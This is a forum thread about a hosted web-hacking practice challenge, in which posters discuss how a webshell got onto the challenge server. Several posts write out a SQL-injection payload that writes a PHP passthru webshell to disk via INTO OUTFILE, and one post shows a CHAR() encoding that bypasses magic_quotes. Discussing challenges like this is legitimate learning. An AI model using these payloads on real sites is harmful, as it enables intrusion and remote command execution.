Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie
Security Challenge II (Web Hacking Intermediate)
Options
Comments
-
Any chance of the code? id love to install this on my VM and actually complete it?
Might I suggest in future that you have to PM for the link to the challenge, might put some of the morons off bothering and give those of us who actually want to learn how to hack manually a chance.
Many thanks for hosting this and putting it together and I hope you are not put off doing more
0 -
-
-
-
-
Advertisement
-
-
-
-
-
-
Advertisement
-
-
-
-
How could anyone get a webshell uploaded,
Mysql was locked to localhost,
phpmyadmin is blocked
and magic_quotes_gpc = On
There the only ways I know to upload a shell using mysql.
The only other way I can think of is an lfi.?id=null union select '<?php passthru($_GET[cmd]);?> OR R57 type Shell' into outfile '/tmp/shell'
and then include it with the lfi.
But that wont work with magic_quotes_gpc = on0 -
How could anyone get a webshell uploaded,
Mysql was locked to localhost,
phpmyadmin is blocked
and magic_quotes_gpc = On
There the only ways I know to upload a shell using mysql.
The only other way I can think of is an lfi.?id=null union select '<?php passthru($_GET[cmd]);?> OR R57 type Shell' into outfile '/tmp/shell'
and then include it with the lfi.
But that wont work with magic_quotes_gpc = on
But magic_quotes wasn't on
Also, when magic quotes is on you can use the CHAR method to get strings into the query, so in this case SELECT '<?php passthru($_GET[cmd]);?> OR R57 type Shell' becomes SELECT CHAR(60, 63, 112, 104, 112, 32, 112, 97, 115, 115, 116, 104, 114, 117, 40, 36, 95, 71, 69, 84, 91, 99, 109, 100, 93, 41, 59, 63, 62, 32, 79, 82, 32, 82, 53, 55, 32, 116, 121, 112, 101, 32, 83, 104, 101, 108, 108) :P
Handy for when people think magic_quotes or mysql_real_escape_string is some kind of magic catch-all, but use integer IDs that aren't ever actually treated as strings so have no quotes to escape :P.0 -
How could anyone get a webshell uploaded,
Mysql was locked to localhost,
phpmyadmin is blocked
and magic_quotes_gpc = On
There the only ways I know to upload a shell using mysql.
The only other way I can think of is an lfi.?id=null union select '<?php passthru($_GET[cmd]);?> OR R57 type Shell' into outfile '/tmp/shell'
and then include it with the lfi.
But that wont work with magic_quotes_gpc = on
It was uploaded to the webroot, which wasn't world-writeable. I will have a glance over the access logs later. It was from someone based in Ireland in anycase, I saved their IP address. I'm curious myself. In anycase, if the person involved wants to shoot me a friendly PM - i'd be happy to chat.0 -
But magic_quotes wasn't on
Also, when magic quotes is on you can use the CHAR method to get strings into the query, so in this case SELECT '<?php passthru($_GET[cmd]);?> OR R57 type Shell' becomes SELECT CHAR(60, 63, 112, 104, 112, 32, 112, 97, 115, 115, 116, 104, 114, 117, 40, 36, 95, 71, 69, 84, 91, 99, 109, 100, 93, 41, 59, 63, 62, 32, 79, 82, 32, 82, 53, 55, 32, 116, 121, 112, 101, 32, 83, 104, 101, 108, 108) :P
Handy for when people think magic_quotes or mysql_real_escape_string is some kind of magic catch-all, but use integer IDs that aren't ever actually treated as strings so have no quotes to escape :P.
You still need quotes for "into outfile" or dumpfile. Otherwise you cant write your shell.
'/tmp/shell'0 -
-
-
-
Advertisement
They get bonus points. 
Advertisement